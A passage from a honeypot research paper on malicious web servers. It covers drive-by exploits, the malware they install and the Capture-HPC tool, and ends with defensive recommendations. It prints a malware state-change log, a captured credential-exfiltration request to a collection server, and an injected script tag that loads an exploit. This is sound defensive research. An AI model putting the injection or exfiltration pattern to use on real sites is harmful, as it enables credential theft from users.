The exploit code doesn't stop there. As previously mentioned, the attack code in Figure 11 will fail on a fully patched version of Internet Explorer. If it does fail, the code in Figure 12 is executed. This code attempts to exploit a vulnerability in Apple's QuickTime (BID: 21829), Winzip (http://www.securityfocus.com/archive/1/455612), and last finally in Microsoft's web view (BID: 19030). The first two target much more recent vulnerabilities and non-browser applications, so even a fully patched Internet Explorer would allow for such an attack to be successful if the proper applications are installed. As browsers are becoming more secure, we expect attackers to concentrate on plug-ins and other client applications such as these.

Figure 12 - Exploit code - portion 2

Monitor	Action	Actor	Action parameter
file	Write	C:Program FilesInternet ExplorerIEXPLORE.EXE	C:syswcon.exe
process	Created	C:Program FilesInternet ExplorerIEXPLORE.EXE	C:syswcon.exe
file	Write	C:syswcon.exe	C:WINDOWSsystem32driversuzcx.exe
process	Created	C:syswcon.exe	C:WINDOWSsystem32driversuzcx.exe
process	Terminated	C:Program FilesInternet ExplorerIEXPLORE.EXE	C:syswcon.exe
registry	SetValueKey	C:WINDOWSsystem32drivers uzcx.exe	HKCUSoftwareewrewuzcxmaincid
file	Write	C:WINDOWSsystem32drivers uzcx.exe	C:Documents and Settingscseifert Local SettingsTemporary Internet FilesContent.IE5OPUJWX63 benupd32[1].exe
file	Write	C:WINDOWSsystem32drivers uzcx.exe	C:WINDOWSbenupd32.exe
process	Created	C:WINDOWSsystem32drivers uzcx.exe	C:WINDOWSbenupd32.exe
registry	SetValueKey	C:WINDOWSsystem32drivers uzcx.exe	HKCUSoftwareewrewuzcxmainterm
process	Created	C:WINDOWSbenupd32.exe	C:WINDOWSbenupd32.exe
file	Write		C:Documents and Settingscseifert Local SettingsTempclean_33d87.dll
process	Created	C:WINDOWSbenupd32.exe"	C:WINDOWSsystem32regsvr32.exe
registry	SetValueKey	C:WINDOWSexplorer.exe	HKLMSYSTEMControlSet001Services ldrsvcParametersServiceDll

Table 3 - Keith Jarrett attack – observed state changes

Once the exploit was successful, malware was downloaded and executed on the client machine. All of this, of course, happens in the background and is not noticeable by the user. Table 3 shows some of the actions taken by the exploit and malware; the malware is downloaded and then executes. Multiple executables and dll files are subsequently written and executed. Benupd32.exe writes the clean_33d87.dll file to disk and proceeds to register and install it as a service, so it will be started automatically upon a reboot of the client machine. These log files were generated with the help of the client honeypot Capture-HPC.

What does the malware do once it takes control of your system? Sniffing the network stream reveals that during web browsing, in particular form submissions, the malware forwards the content of the form to a malicious data collection server named lddpaym.net. An example of these requests is shown in Figure 13. While we were not able to convert the binary data into clear text, we did discover some clear text data collection files on the web that match the format shown of the requests that we captured. These files contained a comprehensive list of URLs and the corresponding form data, mostly account names and passwords. The data was neatly separated per client machine, so it grouped the different account information per user. One stolen username and password is already quite dangerous. If the attacker has a collection of various credentials from the same user, for example e-mail and bank account information, it provides the attacker with a much more powerful set of information that will greatly increase the likelihood of a successful scam. For example, the attacker could first disable e-mail notifications from the user's bank before proceeding to raid their bank account.

/ewDf/dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF
/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVk
WjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache
--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream
Q+XBMVFhG5Q00cU14KO1zhSPDm7HDrF1gGfSICO7kQJkszUFdVQ/RJWldRC1RgUPJD7Nfodu0l
UgswJhs04Gc1VCtxV1FZhhYHAEYQQzkap1vm5/tH6CZdBXIsQT7yeitmJ1ZeKkzjDA80cTZuIWzPbK
Pw/n2qLFMMeCs4NuV3N0E3QEFXXNoMDF1cE1x/TKZN+u/qfOtjHlo6IQA3+nwrYDhGTUJF7EoB
Bk0RV3dK60md7ON86AR2IURuXX32cCBdPExwSEbtBQUbETt/WSOpGr3m4HftK1s3eCENNfV8Y
Vk9R1pBROEEAhNJd0ZsfeZDubqqduAnXQt7EAg2+nIiXHFPRUdM6AlnEUwTQGBS41Hm4PFjrnoaB
nAgDTv8QChRPUVCTAfrCwcGXhxXZlLpJ+D85GmHIFINMDcbM+52O1I7AFlGXOIMRw1WE1JxV
udN+u7hd/0gS057Jwp28GUsVzoGSk1P6gwGEEIcUHwMqRDj9/Br7kMeWjA8ETfsQChRPUVCTAf8F
gcKQQFWYlmGQern+nbhIEULdyROar1xIFA9S0twT+EKBRVbWlx6R/BG/+/rcM4ZMQFtIBo29nc1XD
dDDh0N4QcHGlsbZ39G6kX166F3/SBOa3cmFTbwZjFQKEpCRAm9TQYXVx1bfHfvRvrl4nuqLF0HZy
UOWud7JlE3UkxHQ65aTRZXEFp7TNdP9uridexmVBx3Jx5X4GskTlRQXkoL8QcNGlxcUHFS5kDH9up
662k7TnsnCnbwZSxXOgRTU1yrSVMHRwxZHnSzEqzX3VzaKlACeCUECMkcdgVqBRcVHaxVUk0RT
QIjA9pjk4GFZc0VLhMXQ
--swefasvqdvwxff—

Figure 13 - Data sent by malware

The server involved in collecting the data was different than the server hosting the actual exploit code. The data collection server was located in the Republic of Moldavia, but registered to a person from Ukraine. The server hosting the exploit code was located in Russia and registered to a person from Germany and the site we initially accessed (www.keithjarrett.it) was located in Italy. We were unsuccessful when we ask the administrative contacts for the web server initially accessed to remove the malicious code. It is not at all clear if the original site itself as well as the servers hosting the exploit code were either servers controlled by people intending on distributing malware or had been compromised by attackers and modified to distribute it. However, this example illustrates the diverse nature of the components which are, willingly or unwillingly, involved in the scam to obtain (and eventually (ab)use) account data from users. Given such a distributed network of parties and systems, it would be difficult to identify and prosecute the criminals involved.

http://www.anyboard.net/suggest/posts/7933.html

Another malicious page we identified was located on a server that ran the message board Anyboard. We chose to include an in-depth analysis of this site, because it contains interesting aspects around the attack and the malware deployed. This site allows us to illustrate user submitted exploits, additional measures taken to avoid detection, and social engineering aspects that are involved in the scam.

The attack from anyboard.net demonstrates that the operator of the web site might not always be involved in the attack. The attack is possible because the deployed web application on the server follows bad practices enabling the server to be abused by its users. In this particular instance, the web application allows users to post messages to a threaded message board, but doesn't seem to perform any input validation on the message posts. As a result, malicious users can post harmful JavaScript code. On post 7933, this seems to have happened where a user posted a script to include an exploit as shown in the HTML code snippet shown in Figure 14.

…
<div class="MessageBody"><font size=-1 face="Verdana"><script src="http://www.impliedscripting.com/js/?cl=90716&q=interracial+cuckold"></script>
<br ab><center><h1>Free
…

Figure 14 - User supplied exploit

The exploit itself follows the same pattern as the one found on the Keith Jarrett site. JavaScript is obfuscated, causes several redirects and then actually triggers the real exploit. The import method, however, is different than the one on the Keith Jarrett site though. Instead of using an iframe that imports the exploit, JavaScript code redirects the user to the page that contains the exploit via a client-side redirect as shown in Figure 15. If this code is combined with obfuscation, as this was the case here, it is difficult to follow the code in an automated fashion. Crawlers or low-interaction client honeypots need to be JavaScript-aware to do so. This technique illustrates the attempts to avoid detection and identification of the attack.

Figure 15 - Client-side redirect

Malware Notification

Figure 16 - Malware notification

Once the exploit triggers and gains control of the client machine, we usually observed a quiet installation of malware that subsequently performs its evil deeds. The exploit encountered on anyboard.net is quite different. It applies social engineering strategy by disguising itself as anti-malware software, informing the user that malware exists on the machine, and then proceeds to entice the user to purchase a license of this 「anti-malware software」. Figure 16 shows the initial notification about malware existing on the user's machine. Note how the messaging mechanism resembles the messages of the Microsoft Security Center. Shortly after, the software proceeds to scan the machine and provide specific information about the malware that 「exists」 on the user's machine as shown in Figure 17. Conveniently, a pop-up window suggests to purchase a license of this 「anti-malware software」 online. Major credit cards are accepted.

Pest Trap

Figure 17 - PestTrap

SUMMARY & RECOMMENDATIONS

We have evaluated over 300,000 URLs with our client honeypot Capture-HPC. Several different types of input URLs were inspected by our client honeypot. All input URL categories did contain malicious URLs putting any user accessing the web is at risk. As in real life, some 「neighborhoods」 are more risky than others, but even users that stay clear of these areas can be victimized. We make a few recommendations to reduce the risk of successful attack by a malicious web server. We acknowledge that there is no silver bullet in this effort, but rather our recommendations are designed to reduce the risks to more acceptable levels.

The first recommendation is to reduce the likelihood that a successful attack will do harm. An attack on your browser will inevitably occur, and there are several measures that can make this attack hit a brick wall even if your browser is vulnerable and the attack succeeds. Using the browser as a non-administrator user or within a Sandbox will not allow malware to install itself on the machine. This is already the default on a Windows Vista and Internet Explorer 7 installation, but there are several products freely available for older versions as well, such as AMUST Defender or Sandboxie.

Further, we recommend using a host-based firewall that blocks inbound and outbound connections per application. Many firewalls support a learning mode that dynamically configures the firewall via prompting the user to accept/reject a connection. As users tend to accept the prompts without much consideration, we believe this might result in an insecure configuration of the firewall, and should rather be configured by an expert after the installation. Running a host based firewall would restrict malware from performing its malicious deeds. The malware pushed by the Keith Jarrett site, for instance, could not send the collected user data to a malicious data collection server if a host-based firewall is installed. The outgoing connection would have been blocked based on the fact that the malware application wasn't authorized to make an outbound connection on port 80. Inbound connection blocking is also important. If malware starts a service that allows the attacker to remotely connect to the machine, for instance via a remote desktop software, the firewall could successfully prevent inbound connections from being established. While malware is able to disable such a firewall once it has gained control of the machine, we did not observe such behavior on our client honeypots.

Second, we are recommending methods that stop the attack. We have shown that blacklisting is an effective technique. Since the landscape of malicious servers is quite dynamic, it is important to update such a blacklist on a regular basis just as one updates antivirus signatures. Alternatively, one can use one of the many browser toolbars that make a safety assessment of the site. Patching is the other mechanism that can prevent attacks. Of course, this only works on attacks for which patches are readily available. We recommend patching not only the operating system and browser, but also plug-ins and non-browser applications. As the exploit found on the Keith Jarrett site has shown, attacks also target applications that one might have not think about patching, such as Winzip. Since it is quite difficult to determine whether insecure and unpatched software is running on a system, several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector that performs an online scan of the machine to determine whether unpatched software is running. Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed did need JavaScript to be enabled. Disabling JavaScript, however, might not be feasible as it would severely impact the functionality of many legitimate web sites. Some tools address this problem by globally disabling JavaScript, but selectively enabling it for certain trusted site. NoScript for the Firefox browser is an example of such a tool.

When choosing a search engine to access sites, ensure that you use one that assesses the safety of the sites in its index. Google for instance, displays warning messages on the search results page next to sites that are not safe. While Google's internal blacklist is probably also not complete, it provides another protection layer that might prevent a successful compromise on the machine you are using.

Finally, we make a recommendation on the software to use. Attackers are criminals that would like to attack as many people as possible in order to get the largest return on their investment. As such, they target popular, homogenous systems. The tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn't seem to be a target.

We have just listed a few recommendations that would allow you to reduce the risk of falling victim to an attack by a malicious web server. Implementing such measures does not guarantee full protection, but it does lower the risk. One should practice security in breadth and depth and there are additional measures one can take that are beyond the scope of this paper, such as measures that would detect a successful compromise. To best secure your operating system and browser we suggest contacting your vendor directly for specific instructions on configuration or patching against client-side attacks. You can reference our paper directly with them and inquire as to their specific instructions for mitigating these types of attacks with their software.

The data that we have generated and collected that we reference in this study is available for download from our web site at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip.

FUTURE WORK

In this paper, we have identified malicious web servers with our high interaction client honeypot Capture-HPC. As part of future work, we would like to identify malicious web servers with our low interaction client honeypot HoneyC and compare the results. We suspect that this comparison will give us insights into the detection accuracy, in particular false negatives, of each client honeypot technology.

Further, we would like to expand our research to client-side attacks that target browser plug-ins as well as non-browser client applications. The data we have collected as part of this study already shows that browser plug-ins, such as QuickTime and Winzip, are targeted. A closer look at browser plug-ins will allow us to assess the magnitude of the problem. In addition to browser plug-ins, we would like to evaluate the risk to non-browser applications, such as Microsoft Office, Adobe Acrobat Reader, etc. Many remote execution vulnerabilities have been publicly disclosed for these client applications and it is suspected that they are also targeted. Our future research will determine the extent of the threat.

In addition, time sensitive behavior was not addressed by our study extensively. While we observed that malicious URLs tend to stop soliciting malicious behavior after some time has passed, a representative model of the disappearance and appearance would be necessary in order to assess growth rates of client side attacks. A trend analysis would be required. Along these lines, we would also like to asses how quickly new exploits appear on the Internet. Interesting time factors to consider are the disclosure of the vulnerability, public availability of the exploit and the availability of the patch.

ACKNOWLEDGEMENTS

We would like to thank the following people:

Anton Chuvakin of the Honeynet Project
David Watson of the UK Honeynet Project (reviewer)
Hugo Francisco González Robledo of the Mexican Honeynet Project (reviewer)
Jamie Riden of the UK Honeynet Project (reviewer)
Ian Welch of Victoria University of Wellington (reviewer)
Javier Fernández-Sanguino of the Spanish Honeynet Project (reviewer)
Jeff L. Stutzman of the Honeynet Project (reviewer)
Markus Koetter of the German Honeynet Project (reviewer)
Mark Davies and team of Victoria University of Wellington for providing us with the network infrastructure and support.
Nicolas Fischbach of the Honeynet Project
Niels Provos of the Honeynet Project (reviewer)
Pedro Inacio of the Portuguese Honeynet Project (reviewer)
Peter Komisarczuk of Victoria University of Wellington (reviewer)
Ralph Logan of the Honeynet Project (reviewer)
Roger Carlsen of the Norwegian Honeynet Project (reviewer)
Ryan McGeehan of the Chicago Honeynet Project (reviewer)

Appendix A

ABOUT CAPTURE-HPC

Capture-HPC is a high interaction client honeypot developed at Victoria University of Wellington in conjunction with the New Zealand Honeynet Project. In this section, we describe the tool in more detail. We cover the general functionality and the underlying architecture and technical aspects.

Functionality

Capture-HPC allows to find malicious servers on a network. It does so by driving a vulnerable browser to interact with a list of potentially malicious servers. If any unauthorized state changes are detected, Capture-HPC will classify the last server it interacted with as malicious. Capture is capable to monitor various aspects of the operating system: the file system, registry, and processes that are running. Since some events occur during normal operation (e.g. writing files to the web browser cache), exclusion lists allow to ignore certain type of events.

Architecture

Capture-HPC Architecture

Figure 18 - Capture-HPC Architecture

Capture-HPC is split into two areas as shown in Figure 18: a Capture Server and Capture Client. The primary purpose of the Capture Server is to control numerous Capture Clients that can be installed on multiple VMware servers and multiple guest instances. The Capture Server can start and stop clients, instruct clients to interact with a web server retrieving a specified URI, and it can aggregate the classifications of the Capture Clients regards the web server they have interacted with. The Capture Clients actually perform the work. They accept the commands of the server to start and stop themselves and to visit a web server with a browser of choice. As a Capture Client interacts with a web server, it monitors its state for unauthorized state changes and sends this information back to the Capture Server. In case the classification was malicious, the Capture Server will reset the state of the guest instance to a clean state before proceeding to instruct the Capture Client to interact with the next server.

Technical Description

The Capture server is a simple TCPIP server that manages several capture clients and the VMware servers that host the guest OS that run the Capture Clients. The Capture Server takes each URL it receives and distributes them to the available clients in a round robin fashion. The server listens for clients that connect to the server upon startup on port 7070. The Capture server is written in Java and controls the VMware servers using the VMware C API that it wraps using jni.

Capture Client

Figure 19 - Capture Client

The Capture Client in turn consists of two components, a set of kernel drivers and a user space process as shown in Figure 19. The kernel drivers operate in kernel space and use event-based detection mechanisms for monitoring the system's state changes. The user space process, which accepts visitation requests from the Capture server, drives the client to interact with the server and communicates the state changes back to the server via a simple TCPIP connection. The user space process captures the state changes from the kernel drivers and filters the events based on the exclusion lists. Each component is written in unmanaged C code.

Kernel Drivers

The Capture Client uses kernel drivers to monitor the system by using the existing kernel callback mechanism of the kernel that notifies registered drivers when a certain event happens. These callbacks invoke functions inside of a kernel driver and pass the actual event information so that it can either be modified or, in Capture's case, monitored. The following callback functions are registered by Capture:

CmRegistryCallback
PsSetCreateProcessNotifyRoutine
FilterLoad, FltRegisterFilter

When events are received inside the Capture kernel drivers, they are queued waiting to be sent to the user space component of the tool. This is accomplished by passing a user allocated buffer from user space into kernel space where the kernel drivers then copy information into that buffer, so the application can process it in user space.

User Space Process

The user space process is an application that resides in user space. It is the entry point of the Capture application. It is responsible to load the drivers, process the events received by the drivers and output the events to the log.
As mentioned above, the user space application, once it has loaded the drivers, creates a buffer and passes it from user space to the kernel drivers. Passing of the buffer occurs via the Win32 API and the IO Manager. The kernel drivers copy the event data into the buffer, so the user level application can process the events. Each event is serialized and compared against the entries in the exclusion list. The exclusion lists are built using regular expressions, which means event exclusions can be grouped into one line. This functionality is provided by the Boost::regex library. For each monitor, an exclusion list is parsed and internally mapped between event types and allowed regular expressions are created. If a received event is included in the list, the event is dropped; otherwise, it is output to the final report that Capture generates.

About The Capture-HPC Project

The project is led by Ramon Steenson and Christian Seifert. The tool is open-source (released under the GNU General Public License) and available from our web site at http://www.nz-honeynet.org/capture.html. Installation of the tool requires a Linux/Windows machine capable to running VMware Server and at least one virtual machine with Microsoft Windows. Support can be obtained by our public mailing list at Honeynet Project Capture-HPC support mailing list. The project is also looking for contributors. Please refer to the Capture-HPC web site for more information.

ABOUT THE AUTHORS

Christian Seifert is a PhD candidate at Victoria University of Wellington, New Zealand and is currently on a visiting scholar appointment at the University of Washington in Seattle, WA. His research is targeted at improving the detection accuracy and speed of client honeypots. Christian has an MS in Software Engineering with a focus on computer security from Seattle University, WA. Christian has been a member of the New Zealand Honeynet Project since April 2006.

Ramon Steenson is a software engineer working as a research assistant at the University of Victoria in Wellington, New Zealand and a member of the New Zealand Honeynet Project. He has a Bachelor of Information Technology from that university. His interests include honeypot technologies, computer security, and kernel development.

Thorsten Holz is a Ph.D. student at the Laboratory for Dependable Distributed System at the University of Mannheim, Germany. He is one of the founders of the German Honeynet Project and a member of the Steering Committee of the Honeynet Research Alliance. He regularly blogs at http://honeyblog.org

Bing Yuan is a student at the RWTH Aachen in Germany and member of the German Honeynet Organization. He is responsible for one client-side honeypot project (the CHP system) for which he has written his master thesis. He is interested in researching vulnerabilities of client-side software and client-side exploits using client-side honeypots.

Michael A. Davis is CEO of Savid Technologies, Inc. a security and technology consulting firm in Chicago. He is an active developer and deployer of intrusion detection systems, with contributions to the Snort Intrusion Detection System. Michael is also a member of the Honeynet Project where he is working to develop data and network control mechanisms for Windows-based honeynets. Michael has worked with McAfee, Inc. a leader in anti-virus protection and vulnerability management, as Senior Manager of Global Threats where he led a team of researchers investigating confidential and cutting edge security research. Michael has also worked for companies such as 3com and managed two Internet Service Providers. Lastly, Michael is an active developer in the Open Source community and has ported many popular network security applications to the Windows platform including Snort and Honeyd. Currently, Michael is a contributing author to Hacking Exposed, the number one book on hacker methodology.

訂閱：文章 (Atom)

Just in thinking!